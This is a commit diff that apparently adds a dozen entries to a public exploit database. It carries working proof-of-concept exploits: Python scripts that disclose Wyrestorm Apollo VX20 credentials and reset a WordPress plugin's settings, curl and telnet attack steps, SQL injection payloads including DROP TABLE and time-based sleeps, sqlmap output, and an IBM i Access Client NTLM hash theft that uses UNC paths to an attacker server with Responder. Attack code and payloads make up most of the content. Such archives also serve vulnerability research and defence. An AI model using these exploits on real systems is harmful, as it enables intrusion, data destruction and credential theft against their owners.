DB: 2024-02-27

12 changes to exploits/shellcodes/ghdb Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'DoS' Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure' FAQ Management System v1.0 - 'faq' SQL Injection Flashcard Quiz App v1.0 - 'card' SQL Injection Simple Inventory Management System v1.0 - 'email' SQL Injection comments-like-dislike < 1.2.0 - Authenticated (Subscriber+) Plugin Setting Reset Online Shopping System Advanced - Sql Injection taskhub 2.8.7 - SQL Injection IBM i Access Client Solutions v1.1.2 - 1.1.4_ v1.1.4.3 - 1.1.9.4 - Remote Credential Theft
2024-02-27 00:16:33 +00:00 · 2024-02-27 00:16:33 +00:00 · 9734fcef1e
commit 9734fcef1e
parent 624b24bca9
12 changed files with 730 additions and 0 deletions
--- a/exploits/multiple/dos/51815.txt
+++ b/exploits/multiple/dos/51815.txt
@ -0,0 +1,63 @@
 [+] Credits: John Page (aka hyp3rlinx)
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt
 [+] twitter.com/hyp3rlinx
 [+] ISR: ApparitionSec
 [Vendor]
 www.wyrestorm.com
 [Product]
 APOLLO VX20 < 1.3.58
 [Vulnerability Type]
 Incorrect Access Control (DOS)
 [Affected Product Code Base]
 APOLLO VX20 < 1.3.58, fixed in v1.3.58
 [Affected Component]
 Web interface, reboot and reset commands
 [CVE Reference]
 CVE-2024-25736
 [Security Issue]
 An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.
 [Exploit/POC]
 curl -k https://192.168.x.x/device/reboot
 [Network Access]
 Remote
 [Severity]
 High
 [Disclosure Timeline]
 Vendor Notification: January 18, 2024
 Vendor released fixed firmware v1.3.58: February 2, 2024
 February 11, 2024 : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 hyp3rlinx
--- a/exploits/multiple/remote/51814.txt
+++ b/exploits/multiple/remote/51814.txt
@ -0,0 +1,63 @@
 [+] Credits: John Page (aka hyp3rlinx)
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt
 [+] twitter.com/hyp3rlinx
 [+] ISR: ApparitionSec
 [Vendor]
 www.wyrestorm.com
 [Product]
 APOLLO VX20 < 1.3.58
 [Vulnerability Type]
 Account Enumeration
 [CVE Reference]
 CVE-2024-25734
 [Security Issue]
 An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered.
 Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account.
 [Exploit/POC]
 TELNET x.x.x.x 23
 username:aa
 username:bb
 username:admin
 password:
 [Network Access]
 Remote
 [Affected Product Code Base]
 APOLLO VX20 - < 1.3.58, fixed in v1.3.58
 [Severity]
 Medium
 [Disclosure Timeline]
 Vendor Notification: January 18, 2024
 Vendor released fixed firmware v1.3.58: February 2, 2024
 February 11, 2024 : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 hyp3rlinx
--- a/exploits/multiple/remote/51816.txt
+++ b/exploits/multiple/remote/51816.txt
@ -0,0 +1,83 @@
 [+] Credits: John Page (aka hyp3rlinx)
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
 [+] twitter.com/hyp3rlinx
 [+] ISR: ApparitionSec
 [Vendor]
 www.wyrestorm.com
 [Product]
 APOLLO VX20 < 1.3.58
 [Vulnerability Type]
 Incorrect Access Control (Credentials Disclosure)
 [Affected Component]
 Web interface, config
 [Affected Product Code Base]
 APOLLO VX20 < 1.3.58, fixed in v1.3.58
 [CVE Reference]
 CVE-2024-25735
 [Security Issue]
 An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
 Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
 The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config
 E.g. HTTP response snippet:
 :{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"}
 ,"softAp":{"password":"12345678","router":"y","softAp":"y"}...
 [Exploit/POC]
 import requests
 target="https://x.x.x.x"
 res = requests.get(target+"/device/config", verify=False)
 idx=res.content.find('{"password":')
 if idx != -1:
    idx2=res.content.find('router')
    if idx2 != -1:
        print("[+] CVE-2024-25735 Credentials Disclosure")
        print("[+] " + res.content[idx + 1:idx2 + 11])
        print("[+] hyp3rlinx")
 else:
    print("[!] Apollo vX20 Device not vulnerable...")
 [Network Access]
 Remote
 [Severity]
 High
 [Disclosure Timeline]
 Vendor Notification: January 18, 2024
 Vendor released fixed firmware v1.3.58: February 2, 2024
 February 11, 2024 : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 hyp3rlinx
--- a/exploits/php/remote/51808.txt
+++ b/exploits/php/remote/51808.txt
@ -0,0 +1,64 @@
 # Exploit Title: Simple Inventory Management System v1.0 -  'email'  SQL Injection
 # Google Dork: N/A
 # Application: Simple Inventory Management System
 # Date: 26.02.2024
 # Bugs: SQL Injection
 # Exploit Author: SoSPiro
 # Vendor Homepage: https://www.sourcecodester.com/
 # Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html
 # Version: 1.0
 # Tested on: Windows 10 64 bit Wampserver
 # CVE : N/A
 ## Vulnerability Description:
 This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input.
 ## Proof of Concept (PoC):
 An example attacker could input the following values:
 email: test@gmail.com'%2b(select*from(select(sleep(20)))a)%2b'
 pwd: test
 This would result in the following SQL query:
 SELECT * FROM users WHERE email = 'test@gmail.com'+(select*from(select(sleep(20)))a)+'' AND password = 'anything'
 This attack would retrieve all users, making the login process always successful.
 request-response foto:https://i.imgur.com/slkzYJt.png
 ## Vulnerable code section:
 ====================================================
 ims/login.php
 <?php
 ob_start();
 session_start();
 include('inc/header.php');
 $loginError = '';
 if (!empty($_POST['email']) && !empty($_POST['pwd'])) {
 	include 'Inventory.php';
 	$inventory = new Inventory();
 	// Vulnerable code
 	$login = $inventory->login($_POST['email'], $_POST['pwd']);
 	//
 if(!empty($login)) {
 		$_SESSION['userid'] = $login[0]['userid'];
 		$_SESSION['name'] = $login[0]['name'];
 		header("Location:index.php");
 	} else {
 		$loginError = "Invalid email or password!";
 	}
 }
 ?>
 ## Reproduce: https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html
--- a/exploits/php/remote/51812.txt
+++ b/exploits/php/remote/51812.txt
@ -0,0 +1,46 @@
 # Exploit Title: Flashcard Quiz App v1.0 - 'card' SQL Injection
 # Google Dork: N/A
 # Application: Flashcard Quiz App
 # Date: 25.02.2024
 # Bugs: SQL Injection
 # Exploit Author: SoSPiro
 # Vendor Homepage: https://www.sourcecodester.com/
 # Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html
 # Version: 1.0
 # Tested on: Windows 10 64 bit Wampserver
 # CVE : N/A
 ## Vulnerability Description:
 The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
 ## Proof of Concept (PoC):
 This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL.
 1. Original Code:
 $card = $_GET['card'];
 $query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
 2. Payload:
 ' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
 3. Injected Query:
 DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); --
 Request Response foto: https://i.imgur.com/5IXvpiZ.png
 ## Vulnerable code section:
 ====================================================
 endpoint/delete-flashcard.php
 $card = $_GET['card'];
 $query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";
--- a/exploits/php/remote/51813.txt
+++ b/exploits/php/remote/51813.txt
@ -0,0 +1,48 @@
 # Exploit Title: FAQ Management System v1.0 - 'faq' SQL Injection
 # Google Dork: N/A
 # Application: FAQ Management System
 # Date: 25.02.2024
 # Bugs: SQL Injection
 # Exploit Author: SoSPiro
 # Vendor Homepage: https://www.sourcecodester.com/
 # Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html
 # Version: 1.0
 # Tested on: Windows 10 64 bit Wampserver
 # CVE : N/A
 ## Vulnerability Description:
 The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.
 ## Proof of Concept (PoC):
 An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:
 1. Original Request:
 http://example.com/endpoint/delete-faq.php?faq=123
 2.Malicious Request (SQL Injection):
 http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --
 This would result in a query like:
 DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --
 Which can lead to the deletion of data or even the entire table.
 poc foto: https://i.imgur.com/1IENYFg.png
 ## Vulnerable code section:
 ====================================================
 endpoint/delete-faq.php
 $faq = $_GET['faq'];
 // ...
 $query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";
--- a/exploits/php/webapps/51809.py
+++ b/exploits/php/webapps/51809.py
@ -0,0 +1,62 @@
 # Exploit Title: POC-CVE-2023-3244
 # Date: 9/12/2023
 # Exploit Author: Diaa Hanna
 # Software Link: [download link if available]
 # Version: <= 1.2.0 comments-like-dislike
 # Tested on: 1.1.6 comments-like-dislike
 # CVE : CVE-2023-3244
 #References
 #https://nvd.nist.gov/vuln/detail/CVE-2023-3244
 #The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin.
 #This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users.
 #For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244).
 import requests
 import argparse
 import sys
 from colorama import Fore
 parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244',description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ')
 parser.add_argument('-u','--username',help='username of a user on wordpress with low privileges',required=True)
 parser.add_argument('-p',"--password",help='password of a user on wordpress with low privileges',required=True)
 parser.add_argument('--url',help='the url of the vulnerable server (with http or https)',required=True)
 parser.add_argument('--nossl',help='disable ssl verification',action='store_true',required=False,default=False)
 args=parser.parse_args()
 #check if the domain ends with a '/' if not then add it
 url=args.url
 if url[-1] != '/':
    url+='/'
 wp_login = f'{url}wp-login.php'
 wp_admin = f'{url}wp-admin/'
 username = args.username
 password = args.password
 session=requests.Session()
 #logging in
 session.post(wp_login, headers={'Cookie':'wordpress_test_cookie=WP Cookie check'}, data={'log':username, 'pwd':password, 'wp-submit':'Log In',
        'redirect_to':wp_admin, 'testcookie':'1'  },verify=not (args.nossl))
 #if failed to login
 if len(session.cookies.get_dict()) == 2:
    print(Fore.RED +"Error Logging In Check Your Username and Password And Try Again")
    sys.exit(1)
 #making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function
 #the restore_settings function does not check the sufficient privileges of a logged-in user
 #even a subscriber can use this POC
 response=session.get(f"{wp_admin}/admin-ajax.php?action=cld_settings_restore_action",verify=not (args.nossl))
 if response.text == "Settings restored successfully.Redirecting...":
    print(Fore.GREEN +"exploited excuted successfully")
    print(Fore.YELLOW+ "settings of the comments-like-dislike plugin should be defaulted on the server")
    sys.exit(0)
 else:
    print(Fore.RED + "some error occurred please read the source code of the poc it isn't that long anyway")
    sys.exit(1)
--- a/exploits/php/webapps/51810.txt
+++ b/exploits/php/webapps/51810.txt
@ -0,0 +1,67 @@
 # Exploit Title: taskhub 2.8.7 - SQL Injection
 # Exploit Author: CraCkEr
 # Date: 05/09/2023
 # Vendor: Infinitie Technologies
 # Vendor Homepage: https://www.infinitietech.com/
 # Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
 # Demo: https://taskhub.company/auth
 # Tested on: Windows 10 Pro
 # Impact: Database Access
 # CVE: CVE-2023-4987
 # CWE: CWE-89 - CWE-74 - CWE-707
 ## Greetings
 The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
 CryptoJob (Twitter) twitter.com/0x0CryptoJob
 ## Description
 SQL injection attacks can allow unauthorized access to sensitive data, modification of
 data and crash the application or make it unavailable, leading to lost revenue and
 damage to a company's reputation.
 Path: /home/get_tasks_list
 GET parameter 'project' is vulnerable to SQL Injection
 GET parameter 'status' is vulnerable to SQL Injection
 GET parameter 'user_id' is vulnerable to SQL Injection
 GET parameter 'sort' is vulnerable to SQL Injection
 GET parameter 'search' is vulnerable to SQL Injection
 https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]
 ---
 Parameter: project (GET)
 Type: time-based blind
 Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
 Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
 Parameter: status (GET)
 Type: time-based blind
 Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
 Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
 Parameter: user_id (GET)
 Type: time-based blind
 Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
 Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=
 Parameter: sort (GET)
 Type: time-based blind
 Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
 Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=
 Parameter: search (GET)
 Type: time-based blind
 Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
 Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW
 ---
 [-] Done
--- a/exploits/php/webapps/51811.txt
+++ b/exploits/php/webapps/51811.txt
@ -0,0 +1,75 @@
 # Exploit Title: Online Shopping System Advanced
 # Date: 07.12.2023
 # Exploit Author: Furkan Gedik
 # Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced
 # Software Link: https://github.com/PuneethReddyHC/online-shopping-system-advanced
 # Version: 1.0
 # Tested on: [Kali Linux 2020.3]
 # Description
 Unauthorized access to a database by injecting malicious SQL statements. The SQL injection vulnerability occurs due to the inclusion of the user-provided "cm" parameter in the SQL query without proper filtering or sanitization. An attacker can exploit the vulnerability by injecting malicious SQL code in the "cm" parameter. Successful exploitation of the vulnerability results in the disclosure of sensitive information from the database, such as user credentials, which can be used to gain unauthorized access to the database.
 # PoC
 [+] sqlmap output
 sqlmap.py -u "http://localhost/online-shopping-system-advanced/payment_success.php?st=Completed&cm=1" -p cm --dbms=mysql -technique=T --proxy=http://127.0.0.1:8080
 Parameter: cm (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: st=Completed&cm=1' AND (SELECT 1415 FROM (SELECT(SLEEP(5)))NRHH) AND 'jLpV'='jLpV
 # Vulnerability
 https://github.com/PuneethReddyHC/online-shopping-system-advanced/blob/master/payment_success.php#L12-L22
 [+] payment_success.php
 if (isset($_GET["st"])) {
 # code...
 $trx_id = $_GET["tx"];
  $p_st = $_GET["st"];
  $amt = $_GET["amt"];
  $cc = $_GET["cc"];
  $cm_user_id = $_GET["cm"];
  $c_amt = $_COOKIE["ta"];
 if ($p_st == "Completed") {
  include_once("db.php");
  $sql = "SELECT p_id,qty FROM cart WHERE user_id = '$cm_user_id'";
--- a/exploits/windows_x86-64/remote/51817.txt
+++ b/exploits/windows_x86-64/remote/51817.txt
@ -0,0 +1,96 @@
 [+] Credits: John Page (aka hyp3rlinx)
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt
 [+] twitter.com/hyp3rlinx
 [+] ISR: ApparitionSec
 [Vendor]
 www.ibm.com
 [Product]
 IBM i Access Client Solutions
 [Versions]
 All
 [Remediation/Fixes]
 None
 [Vulnerability Type]
 Remote Credential Theft
 [CVE Reference]
 CVE-2024-22318
 [Security Issue]
 IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.
 Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.
 If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.
 The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.
 [References]
 https://www.ibm.com/support/pages/node/7116091
 [Exploit/POC]
 The client access .HOD File vulnerable parameters:
 1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c
 [KeyRemapFile]
 2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c
 Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv
 The client access legacy .WS File vulnerable parameters:
 DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c
 Example, client access older .WS file
 [Profile]
 ID=WS
 Version=9
 [Telnet5250]
 AssociatedPrinterStartMinimized=N
 AssociatedPrinterTimeout=0
 SSLClientAuthentication=Y
 HostName=PWN
 AssociatedPrinterClose=N
 Security=CA400
 CertSelection=AUTOSELECT
 AutoReconnect=Y
 [KeepAlive]
 KeepAliveTimeOut=0
 [Keyboard]
 IBMDefaultKeyboard=N
 DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
 [Communication]
 Link=telnet5250
 [Network Access]
 Remote
 [Severity]
 Medium
 [Disclosure Timeline]
 Vendor Notification:  December 14, 2023
 Vendor Addresses Issue: February 7, 2024
 February 8, 2024 : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 hyp3rlinx
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10317,6 +10317,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15707,exploits/multiple/dos/15707.txt,"WonderWare InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",dos,multiple,,2010-12-08,2010-12-15,0,CVE-2010-4557;OSVDB-69936,,udpsz.zip,,,http://aluigi.org/adv/inbatch_1-adv.txt
 33099,exploits/multiple/dos/33099.txt,"World in Conflict 1.0.1 - Typecheck Remote Denial of Service",2009-06-16,"Luigi Auriemma",dos,multiple,,2009-06-16,2014-05-01,1,,,,,,https://www.securityfocus.com/bid/35751/info
 31957,exploits/multiple/dos/31957.txt,"World in Conflict 1.008 - Null Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",dos,multiple,,2008-06-23,2014-03-03,1,CVE-2008-6713;OSVDB-46533,,,,,https://www.securityfocus.com/bid/29888/info
 51815,exploits/multiple/dos/51815.txt,"Wyrestorm Apollo VX20  < 1.3.58 - Incorrect Access Control 'DoS'",2024-02-26,hyp3rlinx,dos,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25736,,,,,
 26145,exploits/multiple/dos/26145.c,"Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service",2005-08-10,"Piotr Chytla",dos,multiple,,2005-08-10,2013-06-13,1,CVE-2005-2577;OSVDB-18698,,,,,https://www.securityfocus.com/bid/14536/info
 5152,exploits/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,dos,multiple,,2008-02-18,,1,CVE-2007-5958,,,,,
 25393,exploits/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",dos,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1078;OSVDB-15636,,,,,https://www.securityfocus.com/bid/13131/info
@ -11547,6 +11548,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19667,exploits/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Remote Buffer Overflow",1999-12-09,"Amanda Woodward",remote,multiple,,1999-12-09,2017-11-15,1,CVE-1999-0972;OSVDB-1158,,,,,https://www.securityfocus.com/bid/863/info
 32987,exploits/multiple/remote/32987.txt,"Woodstock 4.2 404 - Error Page Cross-Site Scripting",2009-05-05,DSecRG,remote,multiple,,2009-05-05,2014-04-23,1,CVE-2009-1554;OSVDB-54220,,,,,https://www.securityfocus.com/bid/34829/info
 201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,remote,multiple,21,2000-11-20,2016-12-04,1,OSVDB-11805;CVE-2000-0573,,,,http://www.exploit-db.comwu-ftpd-2.6.0-2.src.rpm,
 51814,exploits/multiple/remote/51814.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Account Enumeration",2024-02-26,hyp3rlinx,remote,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25734,,,,,
 51816,exploits/multiple/remote/51816.txt,"Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'",2024-02-26,hyp3rlinx,remote,multiple,,2024-02-26,2024-02-26,0,CVE-2024-25735,,,,,
 9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple,,2009-07-09,2017-04-01,1,CVE-2009-0695;OSVDB-55839,"Metasploit Framework (MSF)",,,,
 1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",remote,multiple,21,2005-11-03,2018-01-18,1,OSVDB-19682;CVE-2005-3081,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwzdftpd-0.5.4.exe,
 51111,exploits/multiple/remote/51111.txt,"X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)",2023-03-28,"Hosein Vita",remote,multiple,,2023-03-28,2023-03-28,0,CVE-2022-38580,,,,,
@ -12934,6 +12937,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,,2019-03-13,2019-03-28,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/a4c1181b9f81869b7b1df62affbc9554e828f81c/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb
 51749,exploits/php/remote/51749.TXT,"Equipment Rental Script-1.0 - SQLi",2024-01-29,nu11secur1ty,remote,php,,2024-01-29,2024-01-29,0,,,,,,
 24018,exploits/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload (Metasploit)",2013-01-10,Metasploit,remote,php,,2013-01-10,2013-01-10,1,OSVDB-88751,"Metasploit Framework (MSF)",,,,
 51813,exploits/php/remote/51813.txt,"FAQ Management System v1.0 - 'faq' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
 51812,exploits/php/remote/51812.txt,"Flashcard Quiz App v1.0 - 'card' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
 40434,exploits/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,remote,php,,2016-09-27,2016-09-27,0,,"Metasploit Framework (MSF)",,,,
 46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,,2019-05-20,2019-05-20,1,CVE-2019-11231,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
 44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,,2018-07-09,2018-07-09,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comgitlist-0.6.0.tar.gz,https://raw.githubusercontent.com/rapid7/metasploit-framework/545e91af0077d1039b0f861346aada45fdfdf10e/modules/exploits/multi/http/gitlist_arg_injection.rb
@ -13069,6 +13074,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21138,exploits/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload (Metasploit)",2012-09-08,Metasploit,remote,php,,2012-09-08,2012-09-08,1,OSVDB-83767,"Metasploit Framework (MSF)",,,,
 46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,,2019-05-23,2019-05-23,1,CVE-2017-18357,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
 31264,exploits/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,remote,php,80,2014-01-29,2014-01-29,1,OSVDB-102635,"Metasploit Framework (MSF)",,,,
 51808,exploits/php/remote/51808.txt,"Simple Inventory Management System v1.0 - 'email' SQL Injection",2024-02-26,SoSPiro,remote,php,,2024-02-26,2024-02-26,0,,,,,,
 27941,exploits/php/remote/27941.rb,"SPIP - 'connect' PHP Injection (Metasploit)",2013-08-29,Metasploit,remote,php,,2013-08-29,2013-08-29,1,OSVDB-83543,"Metasploit Framework (MSF)",,,,
 24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,"Metasploit Framework (MSF)",,,,
 24902,exploits/php/remote/24902.rb,"STUNSHELL (Web Shell) - PHP Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,php,,2013-03-29,2017-11-14,1,OSVDB-91842,Malware,,,,
@ -16112,6 +16118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37436,exploits/php/webapps/37436.txt,"Commentics - 'index.php' Cross-Site Scripting",2012-06-20,"Jean Pascal Pereira",webapps,php,,2012-06-20,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54111/info
